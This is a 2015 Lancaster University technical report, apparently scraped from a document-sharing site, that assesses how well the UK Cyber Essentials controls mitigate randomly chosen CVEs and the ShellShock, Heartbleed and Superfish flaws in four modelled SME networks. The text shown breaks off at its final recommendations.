Upload
others
View
2
Download
0
Embed Size (px)
Citation preview
LancasterSecurity
CYBER SECURITY CONTROLS EFFECTIVENESSA Qualitative Assessment of Cyber Essentials
Security Lancaster mdash Lancaster University
ContributorsDr Jose M Such (Principal Investigator)John VidlerTim SeabrookProf Awais RashidSecurity LancasterInfolab21 SCCLancaster UniversityLancasterLA1 4WAUnited Kingdom
Cite asSuch JM Vidler J Seabrook T Rashid A Cyber Security ControlsEffectiveness A Qualitative Assessment of Cyber Essentials TechnicalReport SCC-2015-02 Security Lancaster Lancaster University 2015
AcknowledgementsThis Cyber Security research project was funded by the UKGovernment
DisclaimerThis material is provided for general information purposes only Youshould make your own judgement as regards use of this material andseek independent professional advice on your particular circumstancesNeither the publisher nor the author nor any contributors assumeany liability to anyone for any loss or damage caused by any error oromission in the work whether such error or omission is the result ofnegligence or any other cause
ContentsExecutive Summary 2
Introduction 3Aims 3
Methodology 4Data Collection 4Vulnerabilities 4Mitigation Assessment 5
Analysis 6Full Vulnerabilities Assessment 6Case Studies 6Survey Responses 8
Analysis of Cyber Essentials on High Profile Vulnerabilities 10ldquoShellShockrdquo 10ldquoHeartbleedrdquo 10ldquoSuperfishrdquo 10Threat Analysis 11
Conclusions 12Additional Tools 12Cyber Essentials Controls 12Recommendations 12
References 13
Cyber Controls Applicability 14
CVE Details 19
Survey Responses 27
Executive SummaryFindings
This report assesses the Cyber Essentialscontrols effectiveness in mitigating cyber-threats
Two-hundred randomly selected internet-originating vulnerabilities are analysed formitigation across four SME networks with andwithout the Cyber Essentials controls in placeA network built from survey responses is usedto assess the typicality of the SME networksas well as to develop a broader understandingof typical SME network configurations andsecurity-practice
The aggregated results show that withoutthe Cyber Essentials controls none of the
attacks assessed were mitigated on anynetwork This more than anything elseshould be understood by SMEs taking noaction to combat cyber threats simply isnrsquot anoption
With the CE tools more than 99of the vulnerabilities in SMEs interviewedwere mitigated as shown in the figure belowwhich depicts the aggregated results across allcases studied The approx 13 of exploitsonly partially mitigated rely on hardware orsoftware vendors to release patches succinctlyand effectively to combat any vulnerabilities
Once the vendor has released a security
patch the Patch Management componentof Cyber Essentials ensures that the systemreturns to a secure state However up until apatch is released there remains a vulnerabilityin the network For this reason it shouldbe stressed for SMEs to frequently considerwhat services or software is installed whetherit is necessary and whether a more securealternative is available
The few vulnerabilities not mitigated byCyber Essentials are as such because offundamental hard-coded flaws in hardware orsoftware that are unable to be updated orpatched to a secure state
Figure 1 Cyber Essentials Aggregated Vulnerability Mitigation Results
Recommendations
Although the Cyber Essentials tools havebeen shown to successfully mitigate thevast majority of the attacks assessed it isimportant to note that only rsquocommodity-levelrsquoexploits (as defined by the Cyber EssentialsFramework)[10] viable for a remote attackhave been considered
The scope of this report does notaddress vulnerability to insider threats socialengineering physically proximate attackersor other targeted-attacks it may berecommended that a follow-up study with awider scope be carried out to investigate therisks from other forms of attack with the useof Cyber Essentials
The rsquo10 Steps to Cyber Securityrsquo reportpublished by CESG[2] highlights that inorder to maximise the security of a networkit is essential to not only consider theprevention of attacks with the use of toolsbut to also ensure that all employees areadequately educated in network securityand treated with scrutiny through accesslogs and data-loss-prevention schemes inorder to achieve a secure business in the faceof potential local and remote attacks Wewould recommend that especially for largerorganisations additional security measuressuch as these be put in place
For hardware or software identified as
inherently flawed resulting in unmitigatablevulnerabilities our recommendation is thatthese pieces of software or hardware beavoided at all costs when developing an SMEnetwork In addition a global list of un-safe products could be collectively developedand made publicly available This relates toour last recommendation of integrating CyberEssentials further with collective securityapproaches such as The Cyber-securityInformation Sharing Partnership (CiSP)[4]These approaches keep SMEs with the latestinformation about vulnerabilities and othercyber-threat information
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 2 of 28
IntroductionC
yber Essentials was introduced asa government funded scheme firstpublished in April 2014 as an interest
of national security to bolster UK securityin cyberspace The Cyber Essentialsscheme was developed in collaboration withthe Information Assurance for Small andMedium Enterprises (IASME) consortiumthe Information Security Forum (ISF) andthe British Standards Institution (BSI) as aset of basic technical security controls fororganisations to utilize for the mitigation ofthe lsquobottom 80rsquo of remote cyber-threats[3]
The scheme built to provide animplementable of the 10-steps to Cyber-Security[1] was released as part of the2011 UK Cyber Security Strategy[16] andis being backed by the UK government asan organisational standard Thus far it hasbeen adopted by several large organisationsincluding Vodafone Hewlett-Packard (HP)BAE Systems Virgin Media and Barclays[5]
The Cyber Essentials accreditation hasbeen made mandatory from October 1st
2014 for all suppliers of government contractsinvolving ldquothe handling of sensitive andpersonal information and provision of certaintechnical products and servicesrdquo[17]
The Cyber Essentials security controls aresummarised as follows[7]
Firewalls and GatewaysThese are devices designed to preventunauthorised access to or from privatenetworks but good setup of thesedevices either in hardware or softwareform is important for them to be fullyeffective
Secure configurationEnsuring that systems are configured inthe most secure way for the needs ofthe organisation
Access controlEnsuring only those who should haveaccess to systems to have access and atthe appropriate level
Malware protectionEnsuring that virus and malwareprotection is installed and is it up todate
Patch managementEnsuring the latest supported version ofapplications is used and all the necessarypatches supplied by the vendor beenapplied
Figure 2 Cyber Essentials Security Tools
The intended scope of Cyber Essentialsis outlined in the Cyber Essentials SchemeAssurance Framework[10] This states thatthe CE controls are considered as applicableto all sizes of Enterprise as a base level ofprotection against cyber-attacks upon whichindividual organisations may build on withfurther tools network devices or protocols forthe mitigation of targeted attacks The CEScheme is clear in its inclusion of lsquoBring your
own Devicersquo network setups to scope as wellas Cloud-based services and off-the-shelf webapplications Bespoke IT systems such as inmanufacturing and retail are applicable to CEbut hold additional vulnerabilities due to theirnature that are not to be considered
Aims
The purpose of this report is to investigatethe effectiveness of the Cyber Essentialscontrols in mitigating lsquocommodity-levelrsquoattacks attempting to exploit vulnerabilitiesin Small and Medium Enterprise (SME)networks
A commodity-level attack has been definedby CESG[8] as
Any unauthenticated remote attackexploiting a known vulnerability withthe use of tools and techniques openlyavailable for download or purchaseon the internet - and that do notrequire extensive specialist knowledge toconduct1
To effectively assess Cyber Essentials itis firstly necessary to understand the typicalnetwork configurations of SMEs Interviewswith SMEs were carried out to build abstractednetwork models and a survey has beenconducted to build a broader picture of SMEnetwork deployments The survey resultswill help to develop our understanding ofcurrent security practice and cyber-awarenessas well as to build a general-case SME networkwith which to analyse the typicality of SMEsinterviewed
The networks modelled from collected dataare to be considered with and without the useof the Cyber Essentials security controls tocomparatively establish the protection grantedwith the adoption of the CE scheme
1This includes attacks utilising pen-testing software such as Metasploit Kali and the Poison Ivy remote access tool which are capable of scanning network nodes for publiclyknown vulnerabilities in the operating system applications or services in use
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 3 of 28
MethodologyT
he scheme of work for this report has beensplit into the following sections
bull Collection of data through interviews anda survey regarding the implementationand deployment of networks in real-worldSMEs for use in designing paper-modelsto be analysed
bull Composition of a list of suitablevulnerabilities that contains applicablemethods by which remote attackers canexploit commodity-level attacks
bull Assessment of vulnerability mitigation forSME networks with and without the useof the CE Tools
Data Collection
In order to analyse the effectiveness of theCyber Essentials Security Tools four real-world SME networks have been modelledModels have been composed using informationgathered in interviews and abstracted toreduce redundant complexity and removeany linkage with the SME In addition ageneralisable SME model was composed fromSurvey responses to serve as a baselinenetwork from which all SME networks maybe adapted
Interviews
The interviews were composed with the goalof firstly understanding the layout or topologyof the network deployed by an SME To thenbuild on the network configuration it wasimportant to understand how the network isused - where remote connections take placehow local services are utilised and how anattacker sees the network Hardware vendorsoperating systems and version numbers wereconsidered to build a greater understanding ofthe network
Additional questions were posed toexamine the current state of security on thenetwork such as any security accreditationsprevious breaches and how often updates arerolled out
Survey
The Survey was constructed as a stripped-down questionnaire representing the essenceof the questions posed in the Interviews Thisincluded details of the number of workstationsat the SME to gauge its size the localand remote services available the operatingsystems used on the service providers andworkstations the current security policies in
place and the respondentsrsquo awareness of theCE Scheme
Two surveys were sent out one to a securelist of SMEs in the NW Security Cluster[9]and another publicly to closed groups ofsecurity-interested SME representatives
Vulnerabilities
A total of 200 random vulnerabilitieshave been equally taken from two annualvulnerability lists of CVE-2013 and CVE-2014 published by Mitre2 Any vulnerabilitiesfound to be unsuitable for analysis have beenreplaced by a new candidate
In this report we use the Mitreorganisation definition for a vulnerabilitywhich they state as
An information securityldquovulnerabilityrdquo is a mistake in softwarethat can be directly used by ahacker to gain access to a system ornetwork CVE considers a mistake avulnerability if it allows an attackerto use it to violate a reasonablesecurity policy for that system (thisexcludes entirely ldquoopenrdquo security
2CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security
Figure 3 Methodology for Assessing Cyber Essentials
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 4 of 28
policies in which all users are trustedor where there is no consideration ofrisk to the system)
(As shown on Mitreorgrsquos Terminologypage[6] in March rsquo15)
To warrant a CVE entry into the Mitrelist individual vulnerabilities must place theaffected system (or systems) in to a statewhich either
bull allows an attacker to executecommands as another user
bull allows an attacker to access data that iscontrary to the specified access restrictionsfor that data
bull allows an attacker to pose as anotherentity
bull allows an attacker to conduct a denialof service
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities werealso taken in addition to the randomly chosen200 and have been assessed to what extentthe Cyber Essentials scheme would affect thevulnerability of SMEs in these situations
Additionally the applicability of thesevulnerabilities to the SME networks we studiedis included along with the respective potentialto harm operations
Mitigation Assessment
The Vulnerabilities chosen have beenqualitatively assessed for mitigation withand without the use of the Cyber Essentialscontrols The process considers each
component of the controls in asserting whethereach vulnerability would be mitigated partiallymitigated or not mitigated The results aredouble-vetted to ensure correctness
For each of the SMEs Interviewed each ofthe vulnerabilities are assessed for applicabilityto that network configuration In cases wherethe vulnerability is for a specific model ofhardware the network is deemed applicable ifit uses a like-product from the same vendorIn cases where the vulnerability is in softwareonly those referencing software in-use or likelyin-use (based on the SMErsquos practice) aredeemed applicable to the network
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 5 of 28
AnalysisT
he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to
ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)
What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included
The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19
Finally the data collected from the surveyis analysed and used to develop a general-case network model the SME networks arecompared to this to better understand thenuances of each market sector as well theoverall typical configuration of SMEs
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from2013 and 2014 deemed as applicable tothe study and chosen for analysis 131vulnerabilities were mitigated with the useof the Cyber Essentials Security Tools 61vulnerabilities were partially mitigated and 8were not mitigated
Figure 4 Percentage of Full Vulnerabilities ListMitigated
Partially Mitigated 59 of the 61 CVEsjudged as partially mitigated are as suchbecause they rely of patches from third-party software or hardware vendors butthat will be mitigated once a security fixhas been released Despite any level ofsecurity tools being deployed on a network thesecurity involved in using third party softwareunfortunately relies on the vendorrsquos ability toidentify potential areas of risk as well asto quickly respond to security breaches as
they become apparent with the release ofpatches All software installed on an SMEnetwork should be periodically reviewed todecide whether it is necessary - or if thereare more suitable and potentially more securesolutions available
The other two partially mitigatedvulnerabilities rely on website blacklistingcombined with avoiding vulnerable webbrowser software A secure configurationwithout such a browser would mitigate thisvulnerability but as in the Web DevelopmentSME case study it may not always be possibleto avoid the use of a specific software pieceIn a case as this website blacklisting is theonly defence against the vulnerabilities
Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update
For these devices that are fundamentallyflawed from a cyber-security stand-point itcan be that no level of security tools on top ofthe network can aid in mitigation - rather thehardware should be replaced to ensure networksecurity It may be possible for a public list ofall such devices to be developed as part of thegovernment cyber-security scheme - to serveas a device-blacklist for SMEs
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentialscontrols may be assessed Some detail on thephysical structure usage and existing securityof each network is provided
bull SME Network One represents a financespecialist SME using a combination ofexternally managed services for bankingin addition to internal remotely accessibleinternal services for employees
bull SME Network Two represents a specialistSME utilizing an off-site remotely managedserver for administrator services and cloud-based services for employees
bull SME Network Three represents a webservices SME that accesses client serversfrequently and utilises cloud-basedservices daily
bull SME Network Four represents a hospitalityservices provider with a very smallcompany network co-located with a verylarge guest network component where allof the services are remotely managed andlocated
SME Network One - Finance Sector
Physical Infrastructure The companyinterviewed comprised around 20 employeeslocated at 3 sites nationally
Remote workers connect over normalinternet connections both residential andcommercial and use both VPN and non-VPNtraffic (specifically web traffic on port 80) toaccess services supplied by the company
Figure 5 SME-1 Network
The hardware at the head office (wherethe interview was carried out) consists ofequipment by 3Com Draytek BT and Heuwaifor infrastructure components Employees usea range of machines bought between 2011and 2014 comprising a mix of Dell and LenovoPCs
As most of the infrastructure is passive(most of the traffic is handled by a single3Com BaseT-1000 switch) the firmware onthe equipment is unchanged from purchase ifany firmware is present at all
Services At the head office site a WindowsFile Server (SAMBA) server provides local filesharing and allows remote users to accessthe same files via VPN The mail servera Microsoft Exchange Server is an off-sitedeployment managed by an external companybut is a dedicated server for only this company
Additionally a web service and databaseserver is run from a server at the site Thisprovides both local HTTP access to thedatabase it runs as well as having firewallrules put in place to allow external access tothe same system for off-site employees
Numerous other pieces of banking softwareare run on bank-owned remote servers andare accessed and secured via combinationsof smart cards and PIN entry devices alsosupplied by the banks
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 6 of 28
User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router
Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands
User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines
Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors
Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too
SME Network Two - Specialist Group
Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building
Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH
Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router
Figure 7 SME-2 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled
Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain
SME Network Three - Web Development
Physical Infrastructure SME-3 employs 10workers based in one building
Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices
Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router
Figure 9 SME-3 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled
All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing
Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
